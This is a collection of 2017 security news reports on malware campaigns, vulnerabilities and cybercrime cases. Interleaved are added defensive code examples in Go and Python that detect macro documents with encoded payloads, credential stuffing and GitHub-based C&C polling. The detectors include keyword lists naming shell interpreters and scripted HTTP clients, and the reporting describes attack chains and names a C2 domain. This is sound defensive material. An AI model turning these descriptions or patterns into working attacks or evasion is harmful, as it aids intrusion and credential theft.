“Each time a user logs in to the infected SAP server using SAP GUI, the malicious transaction will be executed, calling a program on an endpoint that downloads the ransomware. The next time a user tries to run an SAP GUI application, the malicious transaction will be executed and prevent them from logging on to the SAP server,” Maenkova says.

Once an attacker manages to compromise a system, however, they can execute any command remotely (the command runs with the privileges of the service that executed it). This means that an attack in which a ransom is demanded in exchange for regaining access to the affected systems is only one of the possible scenarios in which the flaw can be abused. Ransomware, however, remains one of the easiest ways to mass-exploit the bug for financial gain.

The good news is that ERPScan isn’t aware of the vulnerability being exploited in the wild. Affected customers are nevertheless advised to apply the released patch as soon as possible, as well as to implement “a vulnerability management process to continuously monitor, identify, evaluate, and mitigate vulnerabilities.”

In the case of this SAP GUI vulnerability, however, the patching process is a rather long and laborious operation, because the patch needs to be installed on each and every PC within the network, ERPScan explains.


Weaponized Word Document Targets macOS, Windows

23.3.2017 securityweek  Apple
A recently uncovered malware campaign was found to be using a weaponized Word document that can be used to target both macOS and Windows machines, Fortinet researchers warn.

The campaign relies on a macro-enabled Word file designed to execute a malicious VBA (Visual Basic for Applications) code. Up to a certain point, the code execution follows the same steps, but then it takes a different path, depending on whether it runs on macOS or Windows.

Similar to a typical macro attack, as soon as the user opens the malicious document, they are prompted to enable macros, which automatically causes the VBA code to be executed (the VBA uses slightly modified code taken from a Metasploit framework).

The code calls the AutoOpen() function, which reads Base64-encoded data from the “Comments” property of the file. From there, the execution route differs depending on whether the victim runs macOS or Windows, Fortinet says.

On macOS, because Python is pre-installed and Python scripts can be executed by default, the malicious attack takes this route. Thus, the base64-decoded script is executed to download another Python script, which researchers discovered to be a slightly modified version of the Python meterpreter file, which is also part of the Metasploit framework.

Once this script is executed, it attempts to connect to a remote domain on port 443, but Fortinet says that the server wasn’t answering client requests during analysis. However, security researchers observed that the Python process remains active on the system while trying to connect to the server.

On Windows systems, the VBA script makes a DOS-style command string starting with cmd.exe, then starts powershell.exe hidden, and executes the base64-encoded code. The PowerShell script was designed to decompress a piece of gzip data to get another PowerShell script and execute it.

The malicious script would ultimately download a file into a newly allocated buffer, with this file found to be a 64-bit DLL. The file is executed when the thread function returns. The malware was also observed establishing communication with the server, but Fortinet didn’t offer further info on its capabilities.
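A triage check for the kind of document described above, as an added example in Go (not Fortinet's code): it opens a macro-enabled OOXML file as a zip, treats word/vbaProject.bin as the macro indicator, and reads the Comments property (dc:description in docProps/core.xml) to see whether it holds a long Base64 blob that decodes to script text. The sample documents are built in memory and constructed for this example; the legacy binary .doc format is not handled.

```go
package main

import (
	"archive/zip"
	"bytes"
	"encoding/base64"
	"encoding/xml"
	"fmt"
	"regexp"
	"strings"
)

// coreProps maps Word's "Comments" property (dc:description in docProps/core.xml).
type coreProps struct {
	Description string `xml:"http://purl.org/dc/elements/1.1/ description"`
}

type Verdict struct {
	HasMacro   bool   // word/vbaProject.bin present, i.e. the file carries VBA
	Base64Blob bool   // Comments is one long Base64 run that decodes cleanly
	ScriptHint string // interpreter keyword seen in the decoded payload, if any
}

// Suspicious: macros plus an encoded payload parked in metadata, as in this campaign.
func (v Verdict) Suspicious() bool { return v.HasMacro && v.Base64Blob }

var b64RE = regexp.MustCompile(`^[A-Za-z0-9+/]{64,}={0,2}$`)

// inspectDocument opens an in-memory .docm/.docx package and fills a Verdict.
func inspectDocument(doc []byte) (Verdict, error) {
	var v Verdict
	zr, err := zip.NewReader(bytes.NewReader(doc), int64(len(doc)))
	if err != nil {
		return v, err
	}
	for _, f := range zr.File {
		switch f.Name {
		case "word/vbaProject.bin":
			v.HasMacro = true
		case "docProps/core.xml":
			rc, err := f.Open()
			if err != nil {
				return v, err
			}
			var cp coreProps
			err = xml.NewDecoder(rc).Decode(&cp)
			rc.Close()
			if err != nil {
				return v, err
			}
			comment := strings.TrimSpace(cp.Description)
			decoded, err := base64.StdEncoding.DecodeString(comment)
			if err != nil || !b64RE.MatchString(comment) {
				continue // ordinary free-text comment
			}
			v.Base64Blob = true
			low := strings.ToLower(string(decoded))
			for _, kw := range []string{"powershell", "python", "cmd.exe"} {
				if strings.Contains(low, kw) {
					v.ScriptHint = kw
					break
				}
			}
		}
	}
	return v, nil
}

// buildSampleDoc constructs a minimal OOXML package in memory (constructed for this
// example, not a real Word file) with the given Comments text and an optional VBA marker.
func buildSampleDoc(comment string, withMacro bool) []byte {
	var buf, esc bytes.Buffer
	xml.EscapeText(&esc, []byte(comment))
	core := `<?xml version="1.0" encoding="UTF-8"?><cp:coreProperties ` +
		`xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" ` +
		`xmlns:dc="http://purl.org/dc/elements/1.1/"><dc:title>Invoice</dc:title>` +
		`<dc:description>` + esc.String() + `</dc:description></cp:coreProperties>`
	zw := zip.NewWriter(&buf)
	w, _ := zw.Create("docProps/core.xml")
	w.Write([]byte(core))
	if withMacro {
		w, _ = zw.Create("word/vbaProject.bin")
		w.Write([]byte{0xD0, 0xCF, 0x11, 0xE0}) // OLE header bytes; content is irrelevant here
	}
	zw.Close()
	return buf.Bytes()
}

func main() {
	stager := strings.Repeat("#", 40) + "\npython -c 'import socket'  # constructed stand-in for the stager"
	payload := base64.StdEncoding.EncodeToString([]byte(stager))
	for _, doc := range [][]byte{buildSampleDoc(payload, true), buildSampleDoc("Quarterly report", true), buildSampleDoc(payload, false)} {
		v, err := inspectDocument(doc)
		fmt.Printf("suspicious=%v hint=%q err=%v\n", v.Suspicious(), v.ScriptHint, err)
	}
}
```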

Both the macOS and Windows malicious programs were observed trying to communicate with subdomains of vvlxpress[.]com.

Although macro malware has been hitting Windows users for a very long time, this is only the second attack to date to abuse malicious macros in an attempt to compromise Macs, after another was detailed in early February. However, this is the first time the same macro-enabled Word document has been used to target both macOS and Windows users.


Cisco Finds Critical Flaw in Industrial Routers

23.3.2017 securityweek Vulnerability
Cisco informed customers on Wednesday that some of its industrial routers are exposed to attacks due to a critical remote code execution vulnerability in the IOx application environment.

The flaw, identified as CVE-2017-3853, affects the Data-in-Motion (DMo) process of IOx and is caused by the lack of proper bounds checking. A remote, unauthenticated attacker can exploit the vulnerability to trigger a stack overflow by sending specially crafted packets that are forwarded to the DMo process for evaluation.

Successful exploitation of the security hole can allow the attacker to execute arbitrary code with root privileges in the virtual instance running on the vulnerable device. However, Cisco pointed out that the router itself is not impacted.

The vulnerability affects Cisco IR809 and IR829 industrial integrated services routers running IOx versions 1.0.0.0 and 1.1.0.0. Users can determine what version is running on their devices through the IOx Local Manager interface.

The flaw has been patched with the release of IOx 1.2.4.2 and Cisco says it’s not aware of any attacks exploiting this vulnerability.

On Wednesday, Cisco also published seven other advisories describing high severity vulnerabilities affecting IOS software, and the application-hosting framework (CAF) component of IOx.

The CAF weaknesses, described as arbitrary file creation and path traversal issues, affect not only 800 series industrial routers, but also 4000 series integrated services routers (ISR4K) and ASR 1000 series aggregation services routers (ASR1K).

A majority of the IOS and IOS XE problems allow remote attackers to cause devices to reload and enter a denial-of-service (DoS) condition, and one can be exploited to inject arbitrary commands with root privileges. Only the command injection exploit requires authentication.

These flaws were discovered by Cisco and there is no evidence of exploitation. All the security bugs have been patched.


Russian Hacker Pleads Guilty to Developing and Distributing Citadel Trojan
23.3.2017 thehackernews Virus

A Russian man accused of developing and distributing the Citadel Banking Trojan, which infected nearly 11 Million computers globally and caused over $500 Million in losses, has finally pleaded guilty to charges of computer fraud.
Mark Vartanyan, 29, known as "Kolypto," pleaded guilty in an Atlanta courtroom on Monday to charges related to computer fraud and is now co-operating with federal prosecutors in return for a reduced sentence of no more than five years in prison.
Vartanyan, a native of Moscow, was arrested in Norway in October 2014 and extradited to the United States in December last year. He was involved in the development, improvement, maintenance and distribution of the nasty Citadel Trojan.
"This successful extradition is yet another example of how cooperation among international law enforcement partners can be used to disrupt and dismantle global cyber syndicates," said U.S. Attorney John Horn.
"This defendant's alleged role in developing and improving Citadel for its use by cyber criminals caused a vast amount of financial harm to individuals and institutions around the world. His appearance in federal court today shows that cyber criminals cannot hide in the shadows of the Internet. We will identify them and bring them to justice wherever they operate."
Initially developed in 2011, Citadel Trojan – a variant of the Zeus banking Trojan – was designed to infect computer systems and steal online banking credentials and other financial information by masquerading itself as legitimate banking sites.
The threat affected over 11 Million computers in at least 90 countries and is estimated to have cost $500 million in losses over a three-year period.
Citadel also introduced a business model in which customers were invited to submit feedback, with the requested functionality and tweaks then incorporated into the product, which helped the malware gain widespread popularity. It was one of the first examples of malware-as-a-service (MaaS).
Sold for up to $2,500, Citadel received regular automated updates, just like with the development of legitimate software programs, to enable the malware to avoid detection by antivirus products and other signature-based security controls.
But eventually, Citadel's source code was leaked in 2013, which helped the antivirus firms to identify and block the threat.
Vartanyan was one of many people who were involved in the development and distribution of the Citadel malware.
Another Russian hacker, Dimitry Belorossov, 22, aka Rainerfox, was also arrested in September 2015 and sentenced to four years and six months in prison after pleading guilty to charges related to the distribution of Citadel and infecting over 7,000 machines.
Vartanyan is scheduled to be sentenced on 21 June 2017.
Despite the two arrests, the US Department of Justice (DoJ) said its investigation into the creator of Citadel malware is still ongoing, indicating that further arrests may be made.


US Suspects North Korea in $81 Million Bangladesh Theft: Report

23.3.2017 securityweek BigBrothers
US federal prosecutors suspect the North Korean government directed last year's theft of $81 million from Bangladesh's account at the New York Federal Reserve Bank, according to a media report Wednesday.

Citing unnamed sources, The Wall Street Journal said prosecutors were developing cases showing Chinese middlemen helped the North Korean government orchestrate the enormous theft from the Bangladesh central bank.

In February 2016, thieves transferred the funds from Bangladesh's account at the New York Fed to accounts in the Philippines using authenticated international bank access codes in the SWIFT system, not by hacking the bank.

It was unclear when or if any charges would be filed but any case might implicate North Korea without charging North Korean officials.

The Justice Department and the New York Fed declined to comment on the report.

The New York Fed over the past year has issued several statements, including joint statements with the central bank of Bangladesh and SWIFT, pledging to recover the stolen funds and enhance security of the payments system.

One statement said officials "remain concerned about this event and recommitted to working together to recover the entire proceeds of the fraud as expeditiously as possible, bring the perpetrators to justice in cooperation with law enforcement from other jurisdictions, and lend support to multilateral international efforts to further protect the global financial system from these types of attacks in the future."

However, the New York Fed did not respond to a request from AFP for comment on the status of the investigation.

Researchers at the security firm Symantec previously had linked the theft to a series of cyber-attacks on the US financial system and the 2014 hacking of Sony Pictures.


Machete espionage campaign continues to target LATAM countries
23.3.2017 securityaffairs CyberSpy

The threat group behind the Machete cyber espionage campaign first spotted in 2014 continues to target entities in Spanish-speaking countries.
According to researchers at the security firm Cylance, the threat actors behind the cyber espionage campaign dubbed Machete continue to target entities in Spanish-speaking countries.

The Machete campaign was first uncovered by the researchers at Kaspersky in August 2014 and according to the experts, it had been active since 2010.

“While assisting the customer, we found a very interesting file in the system that is completely unrelated to China and contained no Chinese coding traces. At first look, it pretends to be a Java related application but after a quick analysis, it was obvious this was something more than just a simple Java file. It was a targeted attack we are calling “Machete”.” wrote Kaspersky in 2014.


The cyber spies targeted intelligence services, embassies, government institutions and military organizations, the majority of the victims at the time were located in Ecuador, Colombia, Peru, Venezuela, Cuba, Spain, and Russia.

The hackers continue to leverage spear-phishing emails and fake blogs to deliver malware and spyware.

“Phishing emails continued to use links to external ZIP or RAR archives, which ultimately contained an executable with the extension SCR. All of the executables SPEAR identified contained either an executable generated by the open source Nullsoft Scriptable Install System (https://sourceforge.net/projects/nsis/) or a self-extracting RAR executable (SFX). NSIS provides a surprisingly easy way for attackers to obfuscate malicious code via multiple common compression routines like ZLib, BZip2, LZMA.” reads the analysis published by Cylance. “The attackers also made extensive use of Hostinger’s cheap web hosting services to deliver initial payloads. SPEAR identified the following URLs were used in phishing attempts:”

The malicious code is able to log keystrokes, capture audio from the microphone, collect geolocation data, take screenshots and images via the webcam, and of course exfiltrate documents to a remote command and control server or a special USB device.

The researchers at Cylance reported the attackers managed to steal more than 100 Gb of data from hundreds of victims.

The majority of the victims identified by Cylance were located in Ecuador, Venezuela, Peru, Argentina and Colombia, but some targets were also found in Korea, the U.S., the Dominican Republic, Bolivia, Cuba, Guatemala, Nicaragua, Mexico, the U.K., Canada, Germany, Russia and Ukraine.

The novelty is represented by the presence of telecommunications and power companies in the list of targeted organizations.

The researchers highlighted that many of the targeted states are known customers of surveillance firms such as FinFisher and Hacking Team, “which suggests they likely have yet to fully mature and develop their own internal cyber capabilities”

Cylance speculates the threat actors are Brazilians because they mostly targeted countries bordering Brazil.

The attackers continued their activity by moving to a new command and control (C&C) infrastructure and applying minor changes to their malicious code mostly to evade detection.

“El Machete has continued largely unimpeded in their espionage activities for the past several years, despite the abundance of publicly available indicators,” the Cylance researchers continue. “Many of these indicators should have allowed defenders to reliably identify this threat, but the majority of antivirus (AV) solutions continue to have very low detection rates across current samples.”

The analysis published by Cylance includes a great deal of useful information, including IoCs; enjoy it.


Turkish Crime Family group will remotely wipe hundreds of millions of iPhones unless Apple pays ransom
23.3.2017 securityaffairs Apple 

Hackers belonging to the Turkish Crime Family group threaten to remotely wipe hundreds of millions of iPhones unless Apple pays a ransom.
Crooks are claiming to have over 627 million iCloud credentials and intend to wipe data from iPhones, iPads and Macs if Apple does not pay $150,000 within two weeks.
Members of the group which calls itself Turkish Crime Family claim that they’ve been involved in selling databases of stolen credentials for the past few years.
“The group said via email that it has had a database of about 519 million iCloud credentials for some time, but did not attempt to sell it until now. The interest for such accounts on the black market has been low due to security measures Apple has put in place in recent years, it said.” reported ComputerWorld.

The members of the group are originally from Istanbul, but now seem to be located in Green Lanes, an area in North London.

The situation is not so critical: changing the iCloud password makes any credentials the crooks hold useless. As usual, I also suggest enabling two-factor authentication.

The hackers claim to have verified over 220 million of the credentials, meaning the login details allowed them to access the corresponding iCloud accounts.
The hackers tested the login credentials using automated scripts and a large number of proxy servers to avoid being blocked by Apple.
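Testing leaked credentials through a large pool of proxies is precisely what defeats the usual per-IP lockout rule: each proxy sends only a handful of attempts, so no single source ever crosses a threshold. The following is an added example, not code from the article or from Apple. It runs two detection rules over constructed iCloud-style authentication log lines (the log format, addresses and user agents are assumed for the example) and shows that a per-IP failure counter sees nothing while population-level signals in the same window catch the run.

```python
"""Credential-stuffing detection over authentication logs.

Per-IP failure counters miss a distributed credential check because each
proxy only sends a few attempts. Looking at the whole population of
attempts in a window instead (many distinct accounts, many distinct
sources, scripted user agents, high failure rate) catches it.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Hypothetical log format assumed for this example:
#   <ISO timestamp> login user=<account> src=<ip> ua="<user agent>" result=OK|FAIL
LOG_RE = re.compile(
    r'^(?P<ts>\S+) login user=(?P<user>\S+) src=(?P<src>\S+) '
    r'ua="(?P<ua>[^"]*)" result=(?P<result>OK|FAIL)$'
)
SCRIPTED_UA_MARKERS = ("python-requests", "curl/", "Go-http-client", "okhttp")


@dataclass(frozen=True)
class LoginEvent:
    ts: str
    user: str
    src: str
    ua: str
    ok: bool


def parse_auth_log(lines):
    """Parse log lines; lines that do not match the format are skipped."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if m:
            events.append(LoginEvent(m["ts"], m["user"], m["src"], m["ua"], m["result"] == "OK"))
    return events


def per_ip_block_candidates(events, max_failures=5):
    """Classic rule: block a source once it exceeds max_failures failed logins."""
    failures = Counter(e.src for e in events if not e.ok)
    return {src for src, n in failures.items() if n > max_failures}


def credential_stuffing_signals(events, min_attempts=20):
    """Population-level signals for one window of login events.

    A stuffing run touches each leaked account about once, from a fresh
    source each time, and most pairs fail. A legitimate user retrying a
    mistyped password is the opposite: one account, one source, few tries.
    """
    attempts = len(events)
    if attempts == 0:
        return {"attempts": 0, "suspected": False}
    users = len({e.user for e in events})
    sources = len({e.src for e in events})
    failures = sum(1 for e in events if not e.ok)
    scripted = sum(1 for e in events if any(tag in e.ua for tag in SCRIPTED_UA_MARKERS))
    signals = {
        "attempts": attempts,
        "distinct_user_ratio": users / attempts,
        "distinct_source_ratio": sources / attempts,
        "failure_rate": failures / attempts,
        "scripted_ua_rate": scripted / attempts,
    }
    signals["suspected"] = (
        attempts >= min_attempts
        and signals["distinct_user_ratio"] >= 0.8
        and signals["distinct_source_ratio"] >= 0.8
        and signals["failure_rate"] >= 0.5
    )
    return signals


# Constructed sample data (not real logs): one legitimate user mistyping a
# password twice from a single IP, then a check of 30 leaked credential
# pairs, each from a different proxy, of which 4 still happen to be valid.
LEGIT_LINES = [
    '2017-03-22T10:00:01Z login user=alice@example.com src=198.51.100.7 ua="Safari/602.1" result=FAIL',
    '2017-03-22T10:00:09Z login user=alice@example.com src=198.51.100.7 ua="Safari/602.1" result=FAIL',
    '2017-03-22T10:00:20Z login user=alice@example.com src=198.51.100.7 ua="Safari/602.1" result=OK',
]
STUFFING_LINES = [
    f'2017-03-22T10:01:{i:02d}Z login user=user{i}@example.com src=203.0.113.{i} '
    f'ua="python-requests/2.13" result={"OK" if i % 8 == 0 else "FAIL"}'
    for i in range(30)
]

if __name__ == "__main__":
    window = parse_auth_log(LEGIT_LINES + STUFFING_LINES)
    print("per-IP rule would block:", per_ip_block_candidates(window))   # empty set
    print("window signals:", credential_stuffing_signals(window))         # suspected: True
```

The per-IP rule returns an empty set for the combined window because no proxy exceeds one failure, while the population rule flags it on 33 attempts spread over 31 accounts and 31 sources with an 85% failure rate. In production the thresholds need a baseline per service, and the response should be a step-up challenge or forced password reset for the accounts that succeeded, not a block on the proxies, which will simply rotate.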
Initially, the Turkish Crime Family crew asked Apple for a $75,000 ransom in Bitcoin or Ethereum. The group has since raised its demand to $150,000 and says it will increase it further if Apple does not pay within three days.

According to Motherboard, Apple will not pay the ransom. The hackers provided screenshots of alleged emails between their members and Apple’s security team. Someone also published a video on YouTube showing how the leaked credentials can be used to access iCloud accounts, but the group claims that the person who shared the video is not one of its members.
“We firstly kindly request you to remove the video that you have uploaded on your YouTube channel as it’s seeking unwanted attention, second of all we would like you to know that we do not reward cyber criminals for breaking the law,” reads a message allegedly sent by a member of Apple’s security team (Motherboard only saw a screenshot of this message, not the original). The alleged Apple team member then says archived communications with the hacker will be sent to the authorities.

Apple did not immediately respond to a request for comment.

“We are doing this because we can and mainly to spread awareness for Karim Baratov and Kerem Albayrak, which both are being detained for the Yahoo hack and one of them is most probably facing heavy sentencing in America,” a representative for the group said via email. “Kerem Albayrak on the other hand is being accused of listing the database for sale online.”

At this point we have to wait until April 7, the date on which the hackers say they will launch the mass attack on iCloud accounts and wipe their contents.


Code Execution Vulnerability Found in LabVIEW

23.3.2017 securityweek Vulnerability
Researchers at Cisco Talos have reported finding a high severity code execution vulnerability in the LabVIEW system design software from National Instruments.

According to Talos, LabVIEW 2016 version 16.0 is affected by a heap-based buffer overflow vulnerability which can be triggered with a specially crafted VI file (a LabVIEW specific format) that causes a user-controlled value to be used as a loop terminator.

By getting a targeted user to open a malicious VI file, a remote attacker can execute arbitrary code. Cisco has published an advisory containing technical details about the flaw, which is tracked as CVE-2017-2775.

The security hole was reported to National Instruments on January 13 and it was disclosed on March 22, but it’s unclear if a patch is available. An update released recently by the vendor does address a memory corruption issue that fits the description.

SecurityWeek has reached out to both Cisco and National Instruments for clarifications and will update this article if they respond.

LabVIEW is often used for data acquisition, instrument control and industrial automation, and this vulnerability could allow a threat actor to compromise a device responsible for controlling a physical system.

“Organizations using this and similar software to control physical systems need to bear in mind the possibility of attackers exploiting vulnerabilities in control software to gain access to physical systems,” Talos said in a blog post.

“Equally, organizations should remember that proprietary file formats do not protect against software vulnerabilities. Even in the absence of a published file format specification vulnerabilities triggered by malicious files may still be discovered,” it added.


Winnti Group Uses GitHub for C&C Communications

23.3.2017 securityweek Virus
The China-linked threat group known as Winnti has been abusing GitHub for command and control (C&C) communications, Trend Micro reported on Wednesday.

Winnti, mainly known for financially-motivated espionage campaigns aimed at the online gaming industry, has been around since at least 2007. A majority of the threat actor’s victims are located in Southeast Asia.

Trend Micro has been monitoring the group and discovered that its malware connected to a GitHub account in order to obtain the exact location of C&C servers.

Winnti has continued to use PlugX, a RAT that is often leveraged by Chinese threat actors, but experts also discovered what appears to be a new backdoor (BKDR64_WINNTI.ONM).

The malware checks an HTML page stored in a GitHub project. The file contains an encrypted string that hides the IP address and port number for the C&C server. The information was encrypted via an algorithm known to be used by PlugX and other algorithms derived from it.

According to Trend Micro, the GitHub project used by Winnti was created in May 2016 and it was first used for C&C communications in August 2016. Experts believe the GitHub account was likely created by the attackers themselves and not hijacked from its original owner.

Between August 17, 2016 and March 12, 2017, Trend Micro observed nearly two dozen C&C server IP and port combinations. Researchers said a majority of the servers were located in the United States, with two in Japan.
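Blocking GitHub is not an option on most networks, so a dead-drop resolver has to be found by behaviour rather than destination. The address changed nearly two dozen times over seven months, which implies (the page does not state it) that the implant re-fetches the page to pick up the current value. The following detector is an added example, not Trend Micro’s or Winnti’s code: it scans constructed proxy-log lines (the log format, the repository path, client addresses and user agents are all assumed for the example) for a source that fetches the same GitHub page at near-fixed intervals, which is the one thing a human browsing a repository does not do.

```python
"""Flag hosts that poll a fixed GitHub page on a near-fixed schedule.

GitHub traffic is normal on most networks, so a dead-drop resolver is not
found by destination alone. What stands out is one source fetching the
same page repeatedly with very regular spacing between requests.
"""
import re
import statistics
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Hypothetical proxy log format assumed for this example:
#   <ISO timestamp> <client ip> <method> <url> "<user agent>" <status>
PROXY_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'"(?P<ua>[^"]*)" (?P<status>\d{3})$'
)
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com", "gist.githubusercontent.com"}


def parse_proxy_log(lines):
    """Return (timestamp, src, url, ua) tuples; lines that do not match are skipped."""
    events = []
    for line in lines:
        m = PROXY_RE.match(line.strip())
        if m is None:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
        events.append((ts, m["src"], m["url"], m["ua"]))
    return events


def url_host(url):
    return url.split("://", 1)[-1].split("/", 1)[0].lower()


def beacon_candidates(events, min_hits=6, max_cv=0.15):
    """Return (src, url, hits, mean_gap_seconds, cv, user_agents) for each
    source/URL pair on GitHub fetched at least min_hits times whose
    inter-request gaps have a coefficient of variation at or below max_cv.
    cv = 0 is perfectly periodic; human browsing sits far above 0.15."""
    by_key = defaultdict(list)
    for ts, src, url, ua in events:
        if url_host(url) in GITHUB_HOSTS:
            by_key[(src, url)].append((ts, ua))
    found = []
    for (src, url), hits in by_key.items():
        if len(hits) < min_hits:
            continue
        hits.sort()  # by timestamp
        stamps = [ts for ts, _ in hits]
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        mean_gap = statistics.mean(gaps)
        if mean_gap <= 0:
            continue
        cv = statistics.pstdev(gaps) / mean_gap
        if cv <= max_cv:
            found.append((src, url, len(hits), round(mean_gap, 1), round(cv, 4),
                          sorted({ua for _, ua in hits})))
    return found


# Constructed sample data (not real traffic). Host 10.0.0.12 polls one raw
# page every ~10 minutes with a little jitter; host 10.0.0.40 is a developer
# reading several pages of a repository at irregular times.
_DROP_URL = "https://raw.githubusercontent.com/example-user/example-repo/master/index.html"
_t = datetime(2017, 3, 22, 9, 0, 0)
INFECTED_LINES = []
for _gap in (0, 600, 605, 598, 602, 600, 597, 603):
    _t += timedelta(seconds=_gap)
    INFECTED_LINES.append(
        f'{_t:%Y-%m-%dT%H:%M:%SZ} 10.0.0.12 GET {_DROP_URL} "Mozilla/4.0 (compatible; MSIE 7.0)" 200'
    )

DEVELOPER_LINES = [
    '2017-03-22T09:03:11Z 10.0.0.40 GET https://github.com/example-org/example-repo/pulls "Mozilla/5.0 Chrome/56.0" 200',
    '2017-03-22T09:03:40Z 10.0.0.40 GET https://github.com/example-org/example-repo/pull/42 "Mozilla/5.0 Chrome/56.0" 200',
    '2017-03-22T09:21:02Z 10.0.0.40 GET https://raw.githubusercontent.com/example-org/example-repo/master/README.md "Mozilla/5.0 Chrome/56.0" 200',
    '2017-03-22T11:47:55Z 10.0.0.40 GET https://github.com/example-org/example-repo/pulls "Mozilla/5.0 Chrome/56.0" 200',
    '2017-03-22T11:48:20Z 10.0.0.40 GET https://www.example.com/news "Mozilla/5.0 Chrome/56.0" 200',
]

if __name__ == "__main__":
    for hit in beacon_candidates(parse_proxy_log(INFECTED_LINES + DEVELOPER_LINES)):
        print("periodic GitHub poller:", hit)
```

Only 10.0.0.12 is reported: eight fetches of the same raw page about 600 seconds apart with a coefficient of variation near zero. Legitimate automation (CI runners, package mirrors, RSS readers) is also periodic, so in practice the hit list is joined against an allow-list of build and mirror hosts, and a non-browser or outdated user agent on a workstation, like the MSIE 7.0 string in the sample, is the second signal worth weighting.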

One user pointed out on Reddit that the C&C servers appear to be hosted by Krypt Technologies, whose services have often been abused for botnets and other threats.

As for the new Winnti backdoor, the malware uses a loader that leverages a modified version of a Microsoft registry tool (loadperf.dll) and the WMI performance adapter service in Windows (wmiAPSrv). The loader imports and decrypts the main payload and loads it into memory.

“Abusing popular platforms like GitHub enables threat actors like Winnti to maintain network persistence between compromised computers and their servers, while staying under the radar,” explained Trend Micro threat researcher Cedric Pernet. “Although Winnti may still be employing traditional malware, its use of a relatively unique tactic to stay ahead of the threat landscape’s curve reflects the increased sophistication that threat actors are projected to employ.”


Lithuanian Man Arrested Over $100 Million Email Scam

23.3.2017 securityweek Spam
A Lithuanian man has been indicted in the United States for tricking two U.S.-based Internet companies into wiring over $100 million to bank accounts he controlled as part of an email fraud scheme.

Evaldas Rimasauskas, 48, was arrested late last week in Lithuania on the basis of a provisional arrest warrant, the New York Office of the FBI said.

The indictment (PDF) claims that Rimasauskas orchestrated a fraudulent scheme from in or about 2013 through in or about 2015 to deceive targeted companies, including a multinational technology company and a multinational online social media company, into wiring funds to bank accounts he controlled.

Rimasauskas registered a company in Latvia with the same name as an Asian-based computer hardware manufacturer, and also opened, maintained, and controlled accounts at banks in Latvia and Cyprus in the name of this company. Then, he started sending fraudulent phishing emails to victim companies – which regularly conducted multimillion-dollar transactions with the legitimate manufacturer – to direct money these companies owed for legitimate goods and services to the accounts he controlled.

As soon as the victim companies wired money to his accounts, Rimasauskas quickly transferred the funds to different bank accounts in various locations throughout the world, including Latvia, Cyprus, Slovakia, Lithuania, Hungary, and Hong Kong.

Further, the individual “caused forged invoices, contracts, and letters that falsely appeared to have been executed and signed by executives and agents of the Victim Companies, and which bore false corporate stamps embossed with the Victim Companies’ names, to be submitted to banks in support of the large volume of funds that were fraudulently transmitted via wire transfer,” U.S. Attorney’s Office, Southern District of New York, says.

Over the course of the scheme, these false and deceptive representations resulted in Rimasauskas causing victim companies to transfer a total of over $100,000,000 in U.S. currency to the accounts he controlled.

Rimasauskas is charged with one count of wire fraud and three counts of money laundering, each of which carries a maximum sentence of 20 years in prison, and one count of aggravated identity theft. Any actual sentence will be determined by the judge.

“From half a world away, Evaldas Rimasauskas allegedly targeted multinational internet companies and tricked their agents and employees into wiring over $100 million to overseas bank accounts under his control. This case should serve as a wake-up call to all companies – even the most sophisticated – that they too can be victims of phishing attacks by cyber criminals. And this arrest should serve as a warning to all cyber criminals that we will work to track them down, wherever they are, to hold them accountable,” acting U.S. Attorney Joon H. Kim said.


'Machete' Continues to Spy on Spanish-Speaking Countries

23.3.2017 securityweek Cyber
The threat group behind the cyber espionage campaign dubbed “Machete” continues to target entities in Spanish-speaking countries, endpoint security firm Cylance reported on Wednesday.

Machete was first analyzed by Kaspersky Lab back in 2014. At the time, the company said the operation had been active since 2010, with some improvements made in 2012.

The list of targeted entities included intelligence services, embassies, government institutions and military organizations. A majority of the victims at the time were located in Venezuela, Ecuador and Colombia, but some compromised systems were also identified in Russia (embassies), Peru, Cuba, Brazil, the U.S., Spain, Sweden, and China.

The attackers had used spear-phishing emails and fake blogs to deliver malware capable of logging keystrokes, capturing audio from the microphone, taking screenshots and photos via the webcam, collecting geolocation data, and exfiltrating files to a remote server or a special USB device.

Cylance researchers have also analyzed the campaign and identified over 300 unique victims in the past month. According to the security firm, the attackers managed to steal more than 100 GB of data from organizations.

A majority of the victims identified by Cylance were located in Ecuador, Venezuela, Peru, Argentina and Colombia, but some targets were also found in Korea, the U.S., the Dominican Republic, Bolivia, Cuba, Guatemala, Nicaragua, Mexico, the U.K., Canada, Germany, Russia and Ukraine.

The types of organizations targeted are mostly the same as reported by Kaspersky, but Cylance also mentioned telecommunications and power companies.

Kaspersky noted in its 2014 report that the attacker appeared to be a native Spanish speaker. Cylance pointed out that it did not see any victims in Brazil, and that the most heavily targeted countries shared a land border with Brazil. This could suggest that the attacks have been launched from Brazil, but it contradicts Kaspersky’s initial finding as Brazilians speak Portuguese.

According to Cylance, the threat actor behind Machete managed to keep its operations alive by moving to a new command and control (C&C) infrastructure and making minor changes to its malware to evade signature-based detection.

“El Machete has continued largely unimpeded in their espionage activities for the past several years, despite the abundance of publicly available indicators. Many of these indicators should have allowed defenders to reliably identify this threat, but the majority of antivirus (AV) solutions continue to have very low detection rates across current samples,” said Cylance researchers.

As for Machete victims, experts pointed out that many of the targeted countries are known customers of companies such as FinFisher and Hacking Team, which suggests that they have yet to develop their own cyber capabilities.


Rogue Cellphone towers used to spread the Android Swearing Trojan
23.3.2017 securityaffairs Android

Chinese scammers are deploying rogue cellphone towers to spread the Android Swearing Trojan via malicious URLs in SMS messages.
Chinese scammers are deploying fake mobile base stations to spread the Android Swearing Trojan through text messages.

The attackers have improved the well-known smishing attack by using rogue cell phone towers as the delivery vector, distributing the Android banking malware via spoofed SMS messages.

The rogue cellphone towers send SMS messages that include a malicious URL and purport to come from China Telecom or China Unicom. According to Check Point, China’s Tencent has also observed the malware being delivered by a more conventional dropper embedded in infected applications.

Because the messages are injected by the rogue base station rather than sent through the carrier’s network, the technique bypasses the anti-spam and anti-fraud controls implemented by carriers.

